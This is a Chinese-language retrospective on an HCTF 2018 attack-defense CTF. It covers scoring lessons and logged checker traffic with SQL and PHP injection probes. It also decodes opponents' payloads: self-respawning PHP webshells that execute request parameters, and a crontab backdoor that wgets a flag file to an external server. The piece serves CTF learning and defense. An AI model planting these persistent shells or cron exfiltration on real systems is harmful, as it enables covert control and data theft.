HCTF 2018 AWD小记

---

反思

跑了这么远去杭州，把小组的脸都给丢尽了…
这里说几个我们吃到亏吧，第一次打awd，举办方的赛制和我们之前练习的情形不太一样。可能考虑到去线下的都是老赛棍，就没有照顾到我们这样的萌新，赛制说明都没有。 直到打到后来才知道，10分钟结算一轮flag，如果被攻击的服务被check宕机了，那么这个flag是无效的。即使你在这10分钟内提交flag，他给你显示flag提交成功，但最后结算的时候是不会算上分的。被check宕机的队伍会扣除60分给没有宕机的队伍每人加10分。我们当时想着提了一堆flag打得贼带感，结果能加上的分少的可怜，第一题除了天枢和蓝莲花的师傅偶尔是正常的一轮能涨上100多分，其他队伍全程宕机，所以防守和进攻同等重要。

其次就是check相关的，我们配网络连ssh浪费了很多时间，1l 0O分不清，导致我们一上线，我们机子里就被种了一堆马。然后我们拿不到最初始的源码，回滚到第一次备份都还是很多页面都是坏的， 最后web1被check宕了2天整的。然后修洞，不要想着给全站555就能防住被传马了，这次上传点也是一个check点，在后面会结合check流量进行详细分析。

再说说运维相关的，这次我们队我负责运维的，有个比较恼火的东西就是，我们上传的洞一直没修复，因为我一直就用的555去防的，导致我们运维的时候想改一点东西，就会加上写的权限，结果种上了一堆内存马。事后去问他们，题目通过散列根据ip生成随机文件名随机密码的不死马，有一个守护进程的马，还有不断复制的马。我当时运维的时候，web1还行，web2一上线找路由规则就摸了半天，他那个是.htaccess套.htaccess的，所以我给自己目录传一个运维shell，怎么都访问不到。其次就是菜刀连不上的，我拿着burp，一条条命令手动输：

1. team用户chmod 777 -R ./upload,给与文件夹的写权限才能删里面的文件
2. www-data用户：killall -u www-data，清掉不死马进程
3. www-data：chmod 777 -R ./upload,将马权限修改
4. 最后再rm -rf才能删掉
   但是这过程因为我们没修洞.. 在用team用户给写权限的时候，一堆马又飞进来了…
   在这上面浪费的时间挺多的，所以得提前准备好py菜刀，提前写好这几步操作。

这次比赛，菜刀是别想了，因为临近考试，webshell的利用脚本还有bug没调试完，所以我们就只能现写各种漏洞类型的利用程序，也就仅仅种个马，读个flag就没了。还有其他的套路都没玩的上。

check流量分析

事后把waf记录的流量导出来整理分析了一番，这次举办方的check可谓是十足的严格，第一天全场web宕机。还有他们还会check是否使用通防。

从流量中可以看到，web1的check流程：
注册->登录->上传图片->包含图片
之所以还在数据中看到一堆乱七八糟的类似payload的东西，这肯定就是主办方check通防的方法了。

所以：

1. 千万不要用555，宁可上一个.htaccess(虽然后面还是被蓝莲花的师傅rm/覆盖了)
2. 不要想着banip了，checkbot的ip会变几次，更何况还会被举报，check到一次扣800分…
3. 切完不要直接删功能点，文件包含这个点，看着就是一个后门'<?php include($_GET['img']); ?>',结果谁知道这是个check点..

time: 
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=reg&flag=ZrMlDhzjtpiKdWQnPNVyBxvw%20'%20or%20select%201,2,3,4,5,(select%200xazuLSJeROvTlnChqgXmBpFckHADoKfGsbdZMPItVwirjENWQUyxY),7,8,9,10,11,12
Host: 192.168.233.40:5005
Content-Length: 274
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
post-data: lang=cn&COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Useranswer=KvcuIkTRwz&COL_Userproblem=%E4%BD%A0%E8%87%AA%E5%B7%B2%E7%9A%84%E7%94%9F%E6%97%A5%EF%BC%9F&source=0&ip=127.0.0.1&COL_Userpass2=123456&COL_Userpass=123456&introducer=&Submit=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C


time: 
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=login&flag=edruHEyhIcsMPivmpoWxlzNjVYCFgLwSaAGDbnkt%20'%20&&%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,(select%200xeYKCTRrMpmofFqEsdNhnZlcXDiUVSbxgzHyGuQJtIBWjvLPwkaOA)
Host: 192.168.233.40:5005
Content-Length: 87
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: application/x-www-form-urlencoded
post-data: COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Userpass=123456&Submit=%E7%99%BB%E5%BD%95


time: 
ip: 192.168.233.42
POST //client/user/emmm_play.class.php?emmm_cms=edit&lang=cn
Host: 192.168.233.40:5005
Content-Length: 79075
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: multipart/form-data; boundary=ad7bceb5053a4b3ca22cd26f34b77a19


time: 
ip: 192.168.233.42
GET /client/user/index.php?img=../../skin/HcSLetgnrb.png
Host: 192.168.233.40:5005
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0

day2-web1:

2018/12/16 02:32:10
GET /check?cmd=sdhABbfUTgCuIWqSnvXRjYLM.move_file(AOFyfsqBgVeoTdKtMSICEjaGbRUHL.base64_decode(file_get_content(VMZthpbqiuzURmGCDEwFHyadSPrNeWxnQsYkKXcgJAjoTlBIOvfL).zGgOeoBqwVrIjayQLUWbDinvh).SFhuxlvKbWkUwMYE HTTP/1.1
IP：192.168.22.243
HOST：192.168.117.100:9009:9009
USER_AGENT：
COOKIE：
REFERER：




2018/12/16 02:37:02
GET /check?cmd=MxyLYmfRiUWuqIFCVowJrOSATEgtHs ' && select 1,2,3,4 HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：
REFERER：


2018/12/16 02:37:02
GET /?cmd=YfLvGKAnQNebwqpPijUu ' or select 1,2,3,4,5,6,7,8,9,10,11,12,(select 0xyUpKDhLVwfBtFivxAbZqEjXCQdJYMaGlozIHPnuekOcNmsgWR),14,15,16,17,18,19,20,21,22,23,24,25 HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：
REFERER：


2018/12/16 02:37:02
GET /users/register?cmd=irTekycoKIWSRCsfUqxBAgapl.substr(NhaVIUPfvOmuAjDgrsXJSKMixYyBZo.readdir(VnAGsifbEUZzjCw.move_file(DivqLWumQORGaTkJrC.readdir(base64_decode(fporTBYmQdAHxyuRXcIEnDFhGOkzMbLaWwNVetUvqjZPgClJKSsi).LEwjPvQxCKFOA).TEivOpdPRkrcouhzVKbeIaFUGH).OMVWBXdxNPGgAeLhS).pdrcXqohZFHW) HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：


POST /users/register?cmd=xRVrcDLSZMUPpbXjsBiOz ' union select 1,2,3,4,5,6,7,(select 0xXctOkvxodFyfGUuTDgblraRziAVSYKsQJHemEjZhwPWnLICNBMqp),9,10,11,12,13,14,15 HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：
POST：username=ecCNkO&confirm_password=kaljXLRHtU&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users/login HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：


2018/12/16 02:37:02
GET /users/login?cmd=bcjusDLfkrpMTwHeloSWZgqAd.file_put_contents(fhHiInvDELpKeJ.readdir(NFvnqgXMJHDE.glob(mtCEkDWycgzqnQVLaJPiZS.assert(ytvJChwoYe.fread(file_put_contents(GwLUrvORJmIPfYjVcMAuCtzBSThHZqXKb).hnrjIwBUuPexykfiWqc).HBSQthcujMYWDFPUkaAVgbivTsnN).KYsLfDbFHW).HGTMvLBkRgDmVKIso).RbIkdCSDoErKHYFqatGNjsWh) HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：


POST /users/login?cmd=GLpMuASfsPFWiXc.fread(CBMwgWxDbtcFPjAmNnXUVovKpieaLY.fread(mzuYHcTVvraCJhXR.dirname(lwzeLcmxMbTUoXgsABfYiJ.system(zHaZomhUABCrlWPykdqbIiD.eval(system(CxrWZSDBOknpjNweauXYdAgvoPzHQJRsbGcfVtElFMyIKThUqimL).jBqTLeChVQsDxmRtIZWbgki).yMqBZgcwzXjblrAYfEUICQThnD).GkovubFLynSrixIcpJgqR).OSyBnrvoWeXuIPNpEGsARZzJ).hsjweqlXxPrDROkMEibS) HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：
POST：username=ecCNkO&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：


POST /users/editprofit?cmd=YzOLfeHKbVjZyhcwonRXtJvTpSEIu.glob(maOUqAfuQhYM.file_get_content(KrzfMtSDuExbLX.move_file(readdir(gKUYOAHyNewQkRnoJfMXBmzpjTiaGdshcCEtFbrqxVWDIvSuPLlZ).TuPQJlhNjUYARoKIDEtCsaWcLBx).vikIXSEDftUW).fPzAivYRQEcIKCXrnNs) HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：
POST：username=QwLryC&email=vESrMpul%40OlZDs


2018/12/16 02:37:02
GET /users HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：


POST /users/editAvatar?cmd=XJqDYlazVZAxwtmNFnIyiQkGSvPcKOHoRfEWT ' and select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select 0xCUJzbVPHQLMpGZxaBDRSFdfhgcWEkryqiswlvjnTutmIAYKNXeoO),30,31,32,33,34,35 HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：
POST：


POST /users?cmd=OYhzfowNAdGcvpRWsUbCXqIn.dirname(ZxtIKuPJprHCifgvGLQDmTeWjEnRsd.assert(qAxgrvhSiK.move_file(UTpIhfOkulKaxSoQjzwLmHZeYtr.substr(JimRENYeHZ.dirname(assert(fldrzeIkncKqORGVTiEtuFhoNwpJAPxSyUBDCLmZvXHWQMagsjYb).mzLflHhTvrCGyjPSnNU).PuvwmptyQRWn).UcrCmvYgKjAFiXEVuIeGw).wBJClAQUGr).puUhczOWfMJQSxIyqXLEGAwnNCKDRZ) HTTP/1.1
IP：192.168.50.150
HOST：192.168.117.100:9009:9009
USER_AGENT：python-requests/2.18.4
COOKIE：PHPSESSID=
REFERER：

沟通

虽然不限制外网，但是网线和wifi切换起来还是很麻烦而且时效性也是个问题。我们在队内用飞鸽传书这个内网聊天程序来解决的。也尝试了双网卡，但是还是有一点小问题。

师傅们的shell

• 默小西师傅的shell：
  moxiaoxi ip:192.168.13.134

他的shell同时还进行了内容检测。其实也可以破，我们清马的时候，记一下文件名，然后清完之后，给他上一个同名文件记录流量，就知道他密码了，然后搭一波顺风车~

system('/bin/echo mo123;/bin/echo JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');


base64:
$path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
$code_template = "PD9waHAKICAgICAgICAgICAgaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICAgICAgICAgIHNldF90aW1lX2xpbWl0KDApOwogICAgICAgICAgICAkZmlsZSA9ICIuNGIyMjMzMWNlODZjOGNhYTBhZGMzNzAzOTMyNmQ1ZmMucGhwIjsKICAgICAgICAgICAgJHNoZWxsID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUthV1lvUUNSZlVrVlJWVVZUVkZzaWFHRnphQ0pkUFQwOUltWmxZV1F3Wm1aaE1EQmpNVGxpTm1JMlpUSTFaVFl3Wm1JelltTmxZalJpSWlrS2V3b2dJQ0FnUUhONWMzUmxiU2drWDFKRlVWVkZVMVJiSW0xdmVHbGhiM2hwTmpZMklsMHBPd3A5Q2o4KycpOwogICAgICAgICAgICB1bmxpbmsoX19GSUxFX18pOwogICAgICAgICAgICB3aGlsZSAoVFJVRSkge3sKICAgICAgICAgICAgaWYgKGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSE9PSRzaGVsbCkge3sgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsICRzaGVsbCk7IH19CiAgICAgICAgICAgIHVzbGVlcCg1KTsKICAgICAgICAgICAgfX0KICAgICAgICAgICAgPz4=";
file_put_contents($path, base64_decode($code_template), LOCK_EX);


$code_template的base64解码
<?php
            ignore_user_abort(true);
            set_time_limit(0);
            $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
            $shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
            unlink(__FILE__);
            while (TRUE) {{
            if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
            usleep(5);
            }}
            ?>
            
            
$shell 解base64：
<?php
if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
{
    @system($_REQUEST["moxiaoxi666"]);
}
?>

• 2：

  system%28%27%2Fbin%2Fecho+mo123%3B%2Fbin%2Fecho+JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fhome%2Fteam%2Fworkdir%2F%2F.4b22331ce86c8caa0adc37039326d5fc.php%3B%2Fbin%2Fecho+xiaoxi456890%27%29%3B
  
  // url decode
  system('/bin/echo mo123;/bin/echo JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');
  
  // base64 decode
  system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
  $code_template = "PD9waHAKICAgICAgICAgICAgaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICAgICAgICAgIHNldF90aW1lX2xpbWl0KDApOwogICAgICAgICAgICAkZmlsZSA9ICIuNGIyMjMzMWNlODZjOGNhYTBhZGMzNzAzOTMyNmQ1ZmMucGhwIjsKICAgICAgICAgICAgJHNoZWxsID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUthV1lvUUNSZlVrVlJWVVZUVkZzaWFHRnphQ0pkUFQwOUltWmxZV1F3Wm1aaE1EQmpNVGxpTm1JMlpUSTFaVFl3Wm1JelltTmxZalJpSWlrS2V3b2dJQ0FnUUhONWMzUmxiU2drWDFKRlVWVkZVMVJiSW0xdmVHbGhiM2hwTmpZMklsMHBPd3A5Q2o4KycpOwogICAgICAgICAgICB1bmxpbmsoX19GSUxFX18pOwogICAgICAgICAgICB3aGlsZSAoVFJVRSkge3sKICAgICAgICAgICAgaWYgKGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSE9PSRzaGVsbCkge3sgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsICRzaGVsbCk7IH19CiAgICAgICAgICAgIHVzbGVlcCg1KTsKICAgICAgICAgICAgfX0KICAgICAgICAgICAgPz4=";
  file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');
  
  // base64 decode
  system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
  $code_template = "<?php
              ignore_user_abort(true);
              set_time_limit(0);
              $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
              $shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
              unlink(__FILE__);
              while (TRUE) {{
              if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
              usleep(5);
              }}
              ?>";
  file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');
  
  
  // decode
  system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
  $code_template = "<?php
              ignore_user_abort(true);
              set_time_limit(0);
              $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
              $shell = base64_decode('<?php
  if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
  {
      @system($_REQUEST["moxiaoxi666"]);
  }Cj8+');
              unlink(__FILE__);
              while (TRUE) {{
              if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
              usleep(5);
              }}
              ?>";
  file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');

• 3: 种crontab后门定时交flag

  system('/bin/echo mo123;/bin/echo KiAqICogKiAqIC91c3IvYmluL3dnZXQgImh0dHA6Ly8xOTIuMTY4LjIwMC4xNTA6ODAwNS9hcGkvdGVhbS9zdWJtaXQvL2MxMzYyODI2MjI5M2M1ODVlYmZhZDM3Y2ExYzVlNzdkNDI4ZjVkY2QiIC1kICImZmxhZz0kKC9iaW4vY2F0IC9mbGFnKSIgLUggIkNvb2tpZTpkZGFhcyIK | /usr/bin/base64 -d | /bin/cat >> /tmp//tmp.conf ; /usr/bin/crontab /tmp//tmp.conf;/bin/echo xiaoxi456890');
  
  
  decode base64
  * * * * * /usr/bin/wget "https://192.168.200.150:8005/api/team/submit//c13628262293c585ebfad37ca1c5e77d428f5dcd" -d "&flag=$(/bin/cat /flag)" -H "Cookie:ddaas"

• 4

  system%28%27%2Fbin%2Fecho+HENCE666%3B%2Fbin%2Fecho+PD9waHAKCQlpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCQlzZXRfdGltZV9saW1pdCgwKTsKCQkkZmlsZSA9ICItLThmMDI5MzhlOWQyMWU2N2JmYzg3MjQwZjU4NGQ2NDQzLnBocCI7CgkJJHNoZWxsID0gJzw%2FcGhwIGlmKCRfUkVRVUVTVFtoYXNoXT09ImY5YjY5YTA5NjUxNGYyODIxMjg5MzVmZDA3N2YyZWJiIil7JGNfMSA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFthXSkpOyRjXzIgPSBiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1JFUVVFU1RbYl0pKTskY18xKCRjXzIpO30%2FPic7CgkJdW5saW5rKF9fRklMRV9fKTsKCQl3aGlsZSAoVFJVRSkge3sKCQlpZiAoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpIT09JHNoZWxsKSB7eyBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJHNoZWxsKTsgfX0KCQl1c2xlZXAoNSk7CgkJfX0KCQk%2FPg%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fvar%2Fwww%2Fhtml%2F%2F--8f02938e9d21e67bfc87240f584d6443.php%3B%2Fbin%2Fecho+ZHANG777%27%29%3B
  
  // decode
  system('/bin/echo HENCE666;/bin/echo PD9waHAKCQlpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCQlzZXRfdGltZV9saW1pdCgwKTsKCQkkZmlsZSA9ICItLThmMDI5MzhlOWQyMWU2N2JmYzg3MjQwZjU4NGQ2NDQzLnBocCI7CgkJJHNoZWxsID0gJzw/cGhwIGlmKCRfUkVRVUVTVFtoYXNoXT09ImY5YjY5YTA5NjUxNGYyODIxMjg5MzVmZDA3N2YyZWJiIil7JGNfMSA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFthXSkpOyRjXzIgPSBiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1JFUVVFU1RbYl0pKTskY18xKCRjXzIpO30/Pic7CgkJdW5saW5rKF9fRklMRV9fKTsKCQl3aGlsZSAoVFJVRSkge3sKCQlpZiAoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpIT09JHNoZWxsKSB7eyBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJHNoZWxsKTsgfX0KCQl1c2xlZXAoNSk7CgkJfX0KCQk/Pg== | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');
  
  // decode base64
  system('/bin/echo HENCE666;/bin/echo <?php
  		ignore_user_abort(true);
  		set_time_limit(0);
  		$file = "--8f02938e9d21e67bfc87240f584d6443.php";
  		$shell = '<?php if($_REQUEST[hash]=="f9b69a096514f282128935fd077f2ebb"){$c_1 = base64_decode(str_rot13($_REQUEST[a]));$c_2 = base64_decode(str_rot13($_REQUEST[b]));$c_1($c_2);}?>';
  		unlink(__FILE__);
  		while (TRUE) {{
  		if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
  		usleep(5);
  		}}
  		?Pg== | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');

• 5

